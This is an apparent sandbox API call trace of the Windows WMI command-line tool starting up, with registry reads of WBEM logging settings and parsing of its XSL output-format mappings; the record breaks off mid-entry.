[0314.121] SysStringLen (param_1="IDENTIFY") returned 0x8 [0314.121] malloc (_Size=0x18) returned 0x2c82830 [0314.121] malloc (_Size=0xc) returned 0x2c82850 [0314.121] SysStringLen (param_1="IMPERSONATE") returned 0xb [0314.121] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0314.121] SysStringLen (param_1="IMPERSONATE") returned 0xb [0314.121] SysStringLen (param_1="IDENTIFY") returned 0x8 [0314.121] SysStringLen (param_1="IDENTIFY") returned 0x8 [0314.121] SysStringLen (param_1="IMPERSONATE") returned 0xb [0314.121] malloc (_Size=0x18) returned 0x2c82868 [0314.121] malloc (_Size=0xc) returned 0x2c82888 [0314.121] SysStringLen (param_1="DELEGATE") returned 0x8 [0314.121] SysStringLen (param_1="IDENTIFY") returned 0x8 [0314.121] SysStringLen (param_1="DELEGATE") returned 0x8 [0314.121] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0314.121] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0314.121] SysStringLen (param_1="DELEGATE") returned 0x8 [0314.121] malloc (_Size=0x18) returned 0x2c828a0 [0314.121] malloc (_Size=0xc) returned 0x2c828c0 [0314.121] malloc (_Size=0x18) returned 0x2c828d8 [0314.121] malloc (_Size=0xc) returned 0x2c828f8 [0314.121] SysStringLen (param_1="NONE") returned 0x4 [0314.121] SysStringLen (param_1="DEFAULT") returned 0x7 [0314.121] SysStringLen (param_1="DEFAULT") returned 0x7 [0314.121] SysStringLen (param_1="NONE") returned 0x4 [0314.122] malloc (_Size=0x18) returned 0x2c82910 [0314.122] malloc (_Size=0xc) returned 0x2c82930 [0314.122] SysStringLen (param_1="CONNECT") returned 0x7 [0314.122] SysStringLen (param_1="DEFAULT") returned 0x7 [0314.122] malloc (_Size=0x18) returned 0x2c82948 [0314.122] malloc (_Size=0xc) returned 0x2c804a0 [0314.122] SysStringLen (param_1="CALL") returned 0x4 [0314.122] SysStringLen (param_1="DEFAULT") returned 0x7 [0314.122] SysStringLen (param_1="CALL") returned 0x4 [0314.122] SysStringLen (param_1="CONNECT") returned 0x7 [0314.122] malloc (_Size=0x18) returned 0x2c804b8 [0314.122] malloc (_Size=0xc) returned 0x2c804d8 [0314.122] SysStringLen (param_1="PKT") returned 0x3 [0314.122] SysStringLen (param_1="DEFAULT") returned 0x7 [0314.123] SysStringLen (param_1="PKT") returned 0x3 [0314.123] SysStringLen (param_1="NONE") returned 0x4 [0314.123] SysStringLen (param_1="NONE") returned 0x4 [0314.123] SysStringLen (param_1="PKT") returned 0x3 [0314.123] malloc (_Size=0x18) returned 0x2c82b50 [0314.123] malloc (_Size=0xc) returned 0x2c804f0 [0314.123] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0314.123] SysStringLen (param_1="DEFAULT") returned 0x7 [0314.123] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0314.123] SysStringLen (param_1="NONE") returned 0x4 [0314.123] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0314.123] SysStringLen (param_1="PKT") returned 0x3 [0314.123] SysStringLen (param_1="PKT") returned 0x3 [0314.123] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0314.123] malloc (_Size=0x18) returned 0x2c82af0 [0314.123] malloc (_Size=0xc) returned 0x2c80508 [0314.123] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0314.123] SysStringLen (param_1="DEFAULT") returned 0x7 [0314.123] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0314.123] SysStringLen (param_1="PKT") returned 0x3 [0314.123] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0314.123] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0314.123] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0314.123] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0314.123] malloc (_Size=0x18) returned 0x2c82b10 [0314.123] malloc (_Size=0x40) returned 0x2c80520 [0314.124] malloc (_Size=0x20a) returned 0x2c897c8 [0314.124] GetSystemDirectoryW (in: lpBuffer=0x2c897c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0314.124] free (_Block=0x2c897c8) [0314.124] malloc (_Size=0xc) returned 0x2c80568 [0314.124] malloc (_Size=0xc) returned 0x2c80580 [0314.124] malloc (_Size=0xc) returned 0x2c82d70 [0314.124] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0314.124] SysStringLen (param_1="\\wbem\\") returned 0x6 [0314.124] free (_Block=0x2c80568) [0314.124] free (_Block=0x2c80580) [0314.124] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0314.124] free (_Block=0x2c82d70) [0314.124] malloc (_Size=0xc) returned 0x2c89940 [0314.124] malloc (_Size=0xc) returned 0x2c897f0 [0314.124] malloc (_Size=0xc) returned 0x2c89958 [0314.124] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0314.124] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0314.125] free (_Block=0x2c89940) [0314.125] free (_Block=0x2c897f0) [0314.125] GetCurrentThreadId () returned 0xe10 [0314.125] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x2b0f3e8 | out: phkResult=0x2b0f3e8*=0x1a0) returned 0x0 [0314.125] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x2b0f3f4, lpcbData=0x2b0f3f0*=0x400 | out: lpType=0x0, lpData=0x2b0f3f4*=0x30, lpcbData=0x2b0f3f0*=0x4) returned 0x0 [0314.125] _wcsicmp (_String1="0", _String2="1") returned -1 [0314.125] _wcsicmp (_String1="0", _String2="2") returned -2 [0314.125] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x2b0f3f0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x2b0f3f0*=0x42) returned 0x0 [0314.125] malloc (_Size=0x86) returned 0x2c82d70 [0314.125] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x2c82d70, lpcbData=0x2b0f3f0*=0x42 | out: lpType=0x0, lpData=0x2c82d70*=0x25, lpcbData=0x2b0f3f0*=0x42) returned 0x0 [0314.125] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0314.125] malloc (_Size=0x42) returned 0x2c82e00 [0314.125] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0314.125] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x2b0f3f4, lpcbData=0x2b0f3f0*=0x400 | out: lpType=0x0, lpData=0x2b0f3f4*=0x36, lpcbData=0x2b0f3f0*=0xc) returned 0x0 [0314.125] _wtol (_String="65536") returned 65536 [0314.125] free (_Block=0x2c82d70) [0314.126] RegCloseKey (hKey=0x0) returned 0x6 [0314.126] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x2b0f884 | out: ppv=0x2b0f884*=0x2e345a8) returned 0x0 [0314.146] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x2e345a8, xmlSource=0x2b0f808*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x2b0f870 | out: isSuccessful=0x2b0f870*=0xffff) returned 0x0 [0314.267] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x2e345a8, DOMElement=0x2b0f880 | out: DOMElement=0x2b0f880*=0x2e36b48) returned 0x0 [0314.268] malloc (_Size=0xc) returned 0x2c89940 [0314.268] IXMLDOMElement:getElementsByTagName (in: This=0x2e36b48, tagName="XSLFORMAT", resultList=0x2b0f87c | out: resultList=0x2b0f87c*=0x2e39ca0) returned 0x0 [0314.269] free (_Block=0x2c89940) [0314.269] IXMLDOMNodeList:get_length (in: This=0x2e39ca0, listLength=0x2b0f878 | out: listLength=0x2b0f878*=21) returned 0x0 [0314.269] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=0, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.270] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="texttable.xsl") returned 0x0 [0314.270] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.270] malloc (_Size=0xc) returned 0x2c898b0 [0314.270] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.270] free (_Block=0x2c898b0) [0314.270] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0314.270] malloc (_Size=0xc) returned 0x2c898c8 [0314.270] malloc (_Size=0xc) returned 0x2c89838 [0314.270] malloc (_Size=0x18) returned 0x2c82d30 [0314.270] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.270] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.270] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.271] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=1, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.271] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="textvaluelist.xsl") returned 0x0 [0314.271] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.271] malloc (_Size=0xc) returned 0x2c89970 [0314.271] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.271] free (_Block=0x2c89970) [0314.271] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0314.271] malloc (_Size=0xc) returned 0x2c899a0 [0314.271] malloc (_Size=0xc) returned 0x2c897f0 [0314.271] SysStringLen (param_1="VALUE") returned 0x5 [0314.271] SysStringLen (param_1="TABLE") returned 0x5 [0314.271] SysStringLen (param_1="TABLE") returned 0x5 [0314.271] SysStringLen (param_1="VALUE") returned 0x5 [0314.271] malloc (_Size=0x18) returned 0x2c82d50 [0314.271] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.272] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.272] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.272] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=2, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.272] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="textvaluelist.xsl") returned 0x0 [0314.272] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.272] malloc (_Size=0xc) returned 0x2c898e0 [0314.272] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.272] free (_Block=0x2c898e0) [0314.272] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0314.272] malloc (_Size=0xc) returned 0x2c89898 [0314.272] malloc (_Size=0xc) returned 0x2c89850 [0314.272] SysStringLen (param_1="LIST") returned 0x4 [0314.272] SysStringLen (param_1="TABLE") returned 0x5 [0314.272] malloc (_Size=0x18) returned 0x2c82990 [0314.272] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.273] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.273] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.273] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=3, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.273] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="rawxml.xsl") returned 0x0 [0314.273] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.273] malloc (_Size=0xc) returned 0x2c89988 [0314.273] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.273] free (_Block=0x2c89988) [0314.273] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0314.273] malloc (_Size=0xc) returned 0x2c89820 [0314.273] malloc (_Size=0xc) returned 0x2c89880 [0314.273] SysStringLen (param_1="RAWXML") returned 0x6 [0314.273] SysStringLen (param_1="TABLE") returned 0x5 [0314.273] SysStringLen (param_1="RAWXML") returned 0x6 [0314.273] SysStringLen (param_1="LIST") returned 0x4 [0314.273] SysStringLen (param_1="LIST") returned 0x4 [0314.273] SysStringLen (param_1="RAWXML") returned 0x6 [0314.273] malloc (_Size=0x18) returned 0x2c82b30 [0314.273] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.274] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.274] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.274] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=4, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.274] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="htable.xsl") returned 0x0 [0314.274] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.274] malloc (_Size=0xc) returned 0x2c898b0 [0314.274] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.274] free (_Block=0x2c898b0) [0314.274] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0314.274] malloc (_Size=0xc) returned 0x2c89910 [0314.274] malloc (_Size=0xc) returned 0x2c89940 [0314.274] SysStringLen (param_1="HTABLE") returned 0x6 [0314.274] SysStringLen (param_1="TABLE") returned 0x5 [0314.274] SysStringLen (param_1="HTABLE") returned 0x6 [0314.274] SysStringLen (param_1="LIST") returned 0x4 [0314.274] malloc (_Size=0x18) returned 0x2c82ab0 [0314.275] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.275] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.275] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.275] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=5, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.275] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="hform.xsl") returned 0x0 [0314.275] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.275] malloc (_Size=0xc) returned 0x2c89868 [0314.275] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.275] free (_Block=0x2c89868) [0314.275] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0314.275] malloc (_Size=0xc) returned 0x2c89970 [0314.275] malloc (_Size=0xc) returned 0x2c89868 [0314.275] SysStringLen (param_1="HFORM") returned 0x5 [0314.275] SysStringLen (param_1="TABLE") returned 0x5 [0314.275] SysStringLen (param_1="HFORM") returned 0x5 [0314.275] SysStringLen (param_1="LIST") returned 0x4 [0314.275] SysStringLen (param_1="HFORM") returned 0x5 [0314.275] SysStringLen (param_1="HTABLE") returned 0x6 [0314.275] malloc (_Size=0x18) returned 0x2c82cd0 [0314.276] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.276] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.276] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.276] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=6, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.276] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="xml.xsl") returned 0x0 [0314.276] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.276] malloc (_Size=0xc) returned 0x2c89988 [0314.276] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.276] free (_Block=0x2c89988) [0314.276] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0314.276] malloc (_Size=0xc) returned 0x2c89808 [0314.276] malloc (_Size=0xc) returned 0x2c89928 [0314.277] SysStringLen (param_1="XML") returned 0x3 [0314.277] SysStringLen (param_1="TABLE") returned 0x5 [0314.277] SysStringLen (param_1="XML") returned 0x3 [0314.277] SysStringLen (param_1="VALUE") returned 0x5 [0314.277] SysStringLen (param_1="VALUE") returned 0x5 [0314.277] SysStringLen (param_1="XML") returned 0x3 [0314.277] malloc (_Size=0x18) returned 0x2c82cf0 [0314.277] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.277] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.277] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.277] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=7, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.277] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="mof.xsl") returned 0x0 [0314.277] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.278] malloc (_Size=0xc) returned 0x2c899b8 [0314.278] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.278] free (_Block=0x2c899b8) [0314.278] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0314.278] malloc (_Size=0xc) returned 0x2c899b8 [0314.278] malloc (_Size=0xc) returned 0x2c898b0 [0314.278] SysStringLen (param_1="MOF") returned 0x3 [0314.278] SysStringLen (param_1="TABLE") returned 0x5 [0314.278] SysStringLen (param_1="MOF") returned 0x3 [0314.278] SysStringLen (param_1="LIST") returned 0x4 [0314.278] SysStringLen (param_1="MOF") returned 0x3 [0314.278] SysStringLen (param_1="RAWXML") returned 0x6 [0314.278] SysStringLen (param_1="LIST") returned 0x4 [0314.278] SysStringLen (param_1="MOF") returned 0x3 [0314.278] malloc (_Size=0x18) returned 0x2c82b70 [0314.278] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.278] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.278] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.278] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=8, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.278] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="csv.xsl") returned 0x0 [0314.278] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.279] malloc (_Size=0xc) returned 0x2c898e0 [0314.279] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.279] free (_Block=0x2c898e0) [0314.279] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0314.279] malloc (_Size=0xc) returned 0x2c898e0 [0314.279] malloc (_Size=0xc) returned 0x2c898f8 [0314.279] SysStringLen (param_1="CSV") returned 0x3 [0314.279] SysStringLen (param_1="TABLE") returned 0x5 [0314.279] SysStringLen (param_1="CSV") returned 0x3 [0314.279] SysStringLen (param_1="LIST") returned 0x4 [0314.279] SysStringLen (param_1="CSV") returned 0x3 [0314.279] SysStringLen (param_1="HTABLE") returned 0x6 [0314.279] SysStringLen (param_1="CSV") returned 0x3 [0314.279] SysStringLen (param_1="HFORM") returned 0x5 [0314.279] malloc (_Size=0x18) returned 0x2c82ad0 [0314.279] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.279] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.279] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.279] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=9, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.279] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="texttable.xsl") returned 0x0 [0314.280] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.280] malloc (_Size=0xc) returned 0x2c89988 [0314.280] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.280] free (_Block=0x2c89988) [0314.280] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0314.280] malloc (_Size=0xc) returned 0x2c89988 [0314.280] malloc (_Size=0xc) returned 0x2c8ac00 [0314.280] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.280] SysStringLen (param_1="TABLE") returned 0x5 [0314.280] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.280] SysStringLen (param_1="VALUE") returned 0x5 [0314.280] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.280] SysStringLen (param_1="XML") returned 0x3 [0314.280] SysStringLen (param_1="XML") returned 0x3 [0314.280] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.280] malloc (_Size=0x18) returned 0x2c82c30 [0314.280] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.280] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.280] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.281] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=10, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.281] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="texttable.xsl") returned 0x0 [0314.281] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.281] malloc (_Size=0xc) returned 0x2c8ac18 [0314.281] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.281] free (_Block=0x2c8ac18) [0314.281] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0314.281] malloc (_Size=0xc) returned 0x2c8ab10 [0314.281] malloc (_Size=0xc) returned 0x2c8ad98 [0314.281] SysStringLen (param_1="texttablewsys") returned 0xd [0314.281] SysStringLen (param_1="TABLE") returned 0x5 [0314.281] SysStringLen (param_1="texttablewsys") returned 0xd [0314.281] SysStringLen (param_1="XML") returned 0x3 [0314.281] SysStringLen (param_1="texttablewsys") returned 0xd [0314.281] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.281] SysStringLen (param_1="XML") returned 0x3 [0314.281] SysStringLen (param_1="texttablewsys") returned 0xd [0314.281] malloc (_Size=0x18) returned 0x2c82b90 [0314.281] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.282] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.282] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.282] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=11, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.282] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="texttable.xsl") returned 0x0 [0314.282] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.282] malloc (_Size=0xc) returned 0x2c8aba0 [0314.282] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.282] free (_Block=0x2c8aba0) [0314.282] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0314.282] malloc (_Size=0xc) returned 0x2c8ac18 [0314.282] malloc (_Size=0xc) returned 0x2c8acc0 [0314.282] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.282] SysStringLen (param_1="TABLE") returned 0x5 [0314.282] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.282] SysStringLen (param_1="XML") returned 0x3 [0314.282] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.282] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.283] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.283] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.283] malloc (_Size=0x18) returned 0x2c82bb0 [0314.283] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.283] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.283] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.283] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=12, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.283] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="texttable.xsl") returned 0x0 [0314.283] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.283] malloc (_Size=0xc) returned 